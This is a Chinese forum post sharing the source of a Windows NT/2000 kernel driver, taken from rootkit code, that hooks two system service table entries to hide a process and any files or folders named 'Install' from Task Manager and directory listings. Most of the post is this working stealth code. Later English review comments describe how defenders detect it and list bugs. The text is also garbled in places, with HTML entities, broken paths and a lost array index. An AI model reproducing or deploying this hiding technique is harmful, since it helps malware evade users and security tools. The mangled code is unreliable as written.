NT/2000下面驱动实现真正的进程,文件,目录隐藏(1分)


热血

NT/2000下面用驱动实现真正的进程,文件,目录隐藏
qinzm
最近看了一下RootKit的代码,把其中进程文件目录隐藏的代码整理出来,
重新编译成一个完整可用的驱动,可以实现定制的进程文件目录的隐藏,
隐藏后,进程管理器无法看到,文件和目录也无法看到,但知道绝对路径的
情况下,可以正常使用隐藏的文件,只对NT/2000有效,编译后的驱动只有2k多.
程序用于实验,请勿非法使用
//////////////////////////////////////////////////////////////////////////////////////
//
// FileName : D:/Temp/Hide/Driver.c
// Version : 1.0
// Creater : QinzhiMing
// Date : 2002:2:25 14:42
// Comment :
//
//////////////////////////////////////////////////////////////////////////////////////
#include "ntddk.h"
#include "Driver.h"
#include "stdio.h"
/////////////////////////////////////////////////////////////////////////////
// Module-wide configuration. All four are written at load time only (see
// DriverEntry / GetProcessNameOffset) and read from the two hook routines below.
//
// NOTE(review): this is a 2002-era Windows NT/2000 kernel-mode sample that
// overwrites two system service table entries (HookSysCall) to filter what
// callers of ZwQuerySystemInformation and ZwQueryDirectoryFile get back. From a
// defender's view the technique leaves an unambiguous footprint: the two table
// slots no longer point into the kernel image, which is exactly what SSDT
// integrity checks and cross-view (user-mode list vs. kernel object) enumeration
// look for. On 64-bit Windows the same write is blocked by Kernel Patch
// Protection, so the sample is historical rather than current.
char g_szHideProcName[] = "Install.exe";   // image name filtered out of SystemProcessInformation (class 5) results
WCHAR g_wszHideFileName[] = L"Install";    // directory entries whose name starts with these 7 WCHARs (14 bytes) are dropped
ULONG g_nProcessNameOffset;                // byte offset of the image name inside EPROCESS; 0 until GetProcessNameOffset() runs
BOOL g_hide_proc = TRUE;                   // not referenced by any code visible in this file
/////////////////////////////////////////////////////////////////////////////
// Driver entry point.
//
// Creates a device object and a DOS symbolic link for it, points every major
// function at OnDriverDispatch, registers OnDriverUnload, locates the image
// name offset inside EPROCESS and finally installs the two service-table hooks.
// Returns the NTSTATUS of the first failing creation call, otherwise the status
// of IoCreateSymbolicLink (HookSysCall and GetProcessNameOffset return nothing,
// so their outcome does not affect the return value).
//
// NOTE(review): the object paths below contain forward slashes as rendered on
// the page; NT object-manager paths use backslashes, so the text appears to have
// been mangled by the forum and is not the code as originally compiled.
NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING pRegisterPath)
{
int i;
NTSTATUS ntStatus;
PDEVICE_OBJECT pDeviceObject;
WCHAR wchrDeviceName[] = L"//Device//Hide";
WCHAR wchrDeviceLinkName[] = L"//DosDevices//Hide";
UNICODE_STRING wszDeviceName;
UNICODE_STRING wszDeviceLinkName;

RtlInitUnicodeString(&wszDeviceName, wchrDeviceName);
// Device type 0x8000 and characteristics 0 are passed as raw numbers; no extension is allocated (size 0).
ntStatus = IoCreateDevice(pDriverObject, 0, &wszDeviceName, 0x00008000, 0, FALSE, &pDeviceObject);
if (ntStatus != STATUS_SUCCESS)
goto Exit0;
RtlInitUnicodeString(&wszDeviceLinkName, wchrDeviceLinkName);
ntStatus = IoCreateSymbolicLink(&wszDeviceLinkName, &wszDeviceName);
if (ntStatus != STATUS_SUCCESS)
{
// Undo the device creation so a failed load leaves nothing behind.
IoDeleteDevice(pDeviceObject);
goto Exit0;
}
// Presumably MajorFunction[i] in the original; the subscript appears to have been lost in the page rendering.
for (i = 0;
i < IRP_MJ_MAXIMUM_FUNCTION;
i++)
pDriverObject->MajorFunction = OnDriverDispatch;
pDriverObject->DriverUnload = OnDriverUnload;
GetProcessNameOffset();
HookSysCall();// hook the two system services; ntStatus is still the symbolic-link result at this point
Exit0:
return ntStatus;
}
/////////////////////////////////////////////////////////////////////////////
// Locate the image-name field inside the EPROCESS structure by scanning the
// current process object for the string "System" and storing the matching
// offset in g_nProcessNameOffset.
//
// The scan covers 3 * PAGE_SIZE bytes starting at the EPROCESS pointer with no
// check against the object's actual size, and it does not stop at the first
// match: the last matching offset wins. Nothing here verifies that the current
// process really is the System process; the caller (DriverEntry) relies on the
// load context for that. If no match is found the global stays 0 and
// GetProcessName() reports failure.
void GetProcessNameOffset()
{
int i;
PEPROCESS CurrentProc;
CurrentProc = PsGetCurrentProcess();
for (i = 0;
i < 3 * PAGE_SIZE;
i++)
{
// strncmp with the length of "System" matches a prefix only.
if(!strncmp("System", (PCHAR)CurrentProc + i, strlen("System")))
g_nProcessNameOffset = i;
}
}
/////////////////////////////////////////////////////////////////////////////
// Copy the image name of the current process into pszName.
//
// pszName: caller-supplied buffer; NT_PROCNAMELEN bytes are copied and a
//          terminator is written at index NT_PROCNAMELEN, so the buffer must
//          hold at least NT_PROCNAMELEN + 1 bytes (NT_PROCNAMELEN comes from
//          Driver.h, which is not shown here).
// Returns TRUE when the name was copied, FALSE when g_nProcessNameOffset is
// still 0 — in that case pszName is left untouched, so callers that do not
// check the result read whatever was in their buffer.
BOOL GetProcessName(PCHAR pszName)
{
char *pszTempName;
PEPROCESS CurrentProc;

if (g_nProcessNameOffset)
{
CurrentProc = PsGetCurrentProcess();
pszTempName = (PCHAR)CurrentProc + g_nProcessNameOffset;
// strncpy does not terminate on its own; the explicit 0 below does.
strncpy(pszName, pszTempName, NT_PROCNAMELEN);
pszName[NT_PROCNAMELEN] = 0;
return TRUE;
}
return FALSE;
}
/////////////////////////////////////////////////////////////////////////////
// Replace the system service table entries for ZwQuerySystemInformation and
// ZwQueryDirectoryFile with the filtering versions defined in this file,
// saving the original pointers in OldZwQuerySystemInformation /
// OldZwQueryDirectoryFile for the hooks to call through and for
// UnHookSysCall() to restore. SYSTEMSERVICE and the function-pointer types
// come from Driver.h (not shown).
//
// cli/sti only mask interrupts on the executing processor; they do not
// serialize against other processors reading the table, and the table is
// written without any write-protection handling. This is the write that
// service-table integrity checks detect.
void HookSysCall()
{
OldZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation));
OldZwQueryDirectoryFile = (ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile));
_asm cli;
(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)) = NewZwQuerySystemInformation;
(ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile)) = NewZwQueryDirectoryFile;
_asm sti;
}
/////////////////////////////////////////////////////////////////////////////
// Restore the two service table entries from the pointers saved by
// HookSysCall(). Called from OnDriverUnload. Same cli/sti caveat as
// HookSysCall: interrupts are masked on this processor only, and nothing
// waits for in-flight calls that are still executing inside the hook bodies.
void UnHookSysCall()
{
_asm cli;
(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)) = OldZwQuerySystemInformation;
(ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile)) = OldZwQueryDirectoryFile;
_asm sti;
}
/////////////////////////////////////////////////////////////////////////////
// Replacement for ZwQuerySystemInformation.
//
// Calls the saved original, and when the request was class 5
// (SystemProcessInformation) walks the returned entry chain and unlinks every
// entry whose ProcessName equals g_szHideProcName (case-insensitive). The
// filtering is skipped when the calling process itself is the hidden one.
// Returns the original call's status unchanged.
//
// NOTE(review): the `&amp;` / `&amp;&amp;` tokens below are HTML-entity garbling of
// `&` / `&&` introduced when the page was captured; the code is kept as rendered.
NTSTATUS NewZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength)
{
NTSTATUS ntStatus;
CHAR szProcessName[PROCNAMELEN];
ANSI_STRING astrProcName;
ANSI_STRING astrHideProcName;
struct SYSTEM_PROCESS *Curr;   // layout comes from Driver.h (not shown); NextEntryDelta / ProcessName are the fields used
struct SYSTEM_PROCESS *Prev;
RtlInitAnsiString(&amp;astrHideProcName, g_szHideProcName);
// Return value ignored: if the offset is unknown szProcessName stays uninitialized for the memcmp below.
GetProcessName(szProcessName);
ntStatus = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation))(
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength);

if(!NT_SUCCESS(ntStatus))
goto Exit0;
if (memcmp(szProcessName, g_szHideProcName, strlen(g_szHideProcName)) == 0)// if the caller is the hidden process itself, return unfiltered
goto Exit0;
if (SystemInformationClass != 5)
goto Exit0;
Curr = (struct SYSTEM_PROCESS *)SystemInformation;
Prev = NULL;
// Label-based loop: Loop -> (match? unlink) -> Next -> advance -> Loop, exiting via Exit0 when Curr is NULL.
Loop:
if (Curr == NULL)
goto Exit0;
// TRUE = allocate the ANSI buffer; it is released at Next on every path.
RtlUnicodeStringToAnsiString(&amp;astrProcName, &amp;(Curr->ProcessName), TRUE);
if ((astrProcName.Length > 0) &amp;&amp;
(astrProcName.Length < 255))
;
else
goto Next;
if (RtlCompareString(&amp;astrProcName, &amp;astrHideProcName, TRUE) != 0)
goto Next;
if (Prev)
{
// Unlink by folding this entry's delta into the previous one; a zero delta marks the chain end.
if (Curr->NextEntryDelta)
Prev->NextEntryDelta += Curr->NextEntryDelta;
else
Prev->NextEntryDelta = 0;
}
else
{
// First entry matched: only the local copy of the SystemInformation
// parameter is advanced here, so the caller's buffer is not affected.
if (Curr->NextEntryDelta)
(char *)SystemInformation += Curr->NextEntryDelta;
else
SystemInformation = NULL;
}
Next:
RtlFreeAnsiString(&amp;astrProcName);
// Prev is updated even after an unlink, so the unlinked entry becomes Prev for the next iteration.
Prev = Curr;
if (Curr->NextEntryDelta)
(char *)Curr += Curr->NextEntryDelta;
else
Curr = NULL;
goto Loop;
Exit0:
return ntStatus;
}
/////////////////////////////////////////////////////////////////////////////
// Dispatch routine registered for every major function in DriverEntry.
// Completes each IRP immediately with STATUS_SUCCESS and no priority boost;
// IoStatus.Information is not set here (the assignment is in the
// commented-out block), so the byte count reported to the caller is whatever
// the IRP already held. The device exposes no IOCTLs.
NTSTATUS OnDriverDispatch(IN PDEVICE_OBJECT pDeviceObject, IN PIRP Irp)
{
/* PIO_STACK_LOCATION IrpStack;
Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;
IrpStack = IoGetCurrentIrpStackLocation(Irp);*/
Irp->IoStatus.Status = STATUS_SUCCESS;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
// Reading Irp after IoCompleteRequest: the IRP may already be freed at this point.
return Irp->IoStatus.Status;
}
/////////////////////////////////////////////////////////////////////////////
// Unload routine: restores the service table, then removes the symbolic link
// and the device created in DriverEntry. The link name is duplicated here
// rather than shared with DriverEntry, so the two strings must be kept in sync
// by hand.
//
// NOTE(review): `&amp;` below is HTML-entity garbling of `&` from the page capture.
void OnDriverUnload(IN PDRIVER_OBJECT pDriverObject)
{
WCHAR wchrDeviceLinkName[] = L"//DosDevices//Hide";
UNICODE_STRING wszDeviceLinkName;

// Unhook first so no new calls enter the hook bodies while the driver is being torn down.
UnHookSysCall();
RtlInitUnicodeString(&amp;wszDeviceLinkName, wchrDeviceLinkName);
IoDeleteSymbolicLink(&amp;wszDeviceLinkName);
IoDeleteDevice(pDriverObject->DeviceObject);
}
/////////////////////////////////////////////////////////////////////////////
// Replacement for ZwQueryDirectoryFile.
//
// Calls the saved original, then walks the returned directory entries and
// removes every entry whose name begins with the 7 WCHARs of
// g_wszHideFileName (14-byte RtlCompareMemory). Entries are removed by
// shifting the remainder of the buffer down, or by terminating the previous
// entry's link when the match is the last one. If the only entry in the buffer
// matches, the call reports 0x80000006 (STATUS_NO_MORE_FILES). Filtering is
// skipped when the caller's image name starts with "Install".
//
// pDirEntry / dwLenToNext / suName come from Driver.h (not shown); the code
// assumes every FILE_INFORMATION_CLASS it sees has that layout, which is not
// checked against FileInfoClass.
//
// NOTE(review): `&amp;` below is HTML-entity garbling of `&` from the page capture.
NTSTATUS NewZwQueryDirectoryFile(
IN HANDLE hFile,
IN HANDLE hEvent OPTIONAL,
IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
IN PVOID IoApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK pIoStatusBlock,
OUT PVOID FileInformationBuffer,
IN ULONG FileInformationBufferLength,
IN FILE_INFORMATION_CLASS FileInfoClass,
IN BOOLEAN bReturnOnlyOneEntry,
IN PUNICODE_STRING PathMask OPTIONAL,
IN BOOLEAN bRestartQuery)
{
NTSTATUS ntStatus;
CHAR szProcessName[PROCNAMELEN];
BOOL bLastOne;
int iPos;
int iLeft;
pDirEntry pCurrDir;
pDirEntry pLastDir;

// Return value ignored: with an unknown offset szProcessName is uninitialized for the memcmp below.
GetProcessName(szProcessName);
ntStatus = ((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile)) (
hFile,
hEvent,
IoApcRoutine,
IoApcContext,
pIoStatusBlock,
FileInformationBuffer,
FileInformationBufferLength,
FileInfoClass,
bReturnOnlyOneEntry,
PathMask,
bRestartQuery);
if (!NT_SUCCESS(ntStatus))
goto Exit0;
// Asynchronous completion (hEvent / APC) is not handled: the buffer is walked right away.
if (memcmp(szProcessName, "Install", 7) == 0)
goto Exit0;
pCurrDir = (pDirEntry)FileInformationBuffer;
pLastDir = NULL;
do
{
bLastOne = !(pCurrDir->dwLenToNext);
// Prefix match only: 14 bytes = the 7 characters of L"Install".
if (RtlCompareMemory((PVOID)&amp;pCurrDir->suName[0], (PVOID)&amp;g_wszHideFileName[0], 14) == 14)
{
if (bLastOne)
{
if (pCurrDir == (pDirEntry)FileInformationBuffer)
ntStatus = 0x80000006;   // STATUS_NO_MORE_FILES: the sole entry was removed
else

pLastDir->dwLenToNext = 0;   // pLastDir is non-NULL here because pCurrDir is not the first entry
break;
}
else

{
// Shift everything after this entry down over it. iLeft is derived from the
// buffer length, not from the byte count the original call returned, so the
// copy can extend past the valid data (but stays inside the caller's buffer).
iPos = ((ULONG)pCurrDir) - (ULONG)FileInformationBuffer;
iLeft = (DWORD)FileInformationBufferLength - iPos - pCurrDir->dwLenToNext;
RtlCopyMemory((PVOID)pCurrDir, (PVOID)((char *)pCurrDir + pCurrDir->dwLenToNext), (DWORD)iLeft);
// continue re-evaluates the while condition (bLastOne is FALSE) and re-examines the shifted-in entry without advancing.
continue;
}
}
pLastDir = pCurrDir;
pCurrDir = (pDirEntry)((char *)pCurrDir + pCurrDir->dwLenToNext );
} while (!bLastOne);
Exit0:
return ntStatus;
}
/////////////////////////////////////////////////////////////////////////////
 
给大家看看,我提
 
接受答案了.
 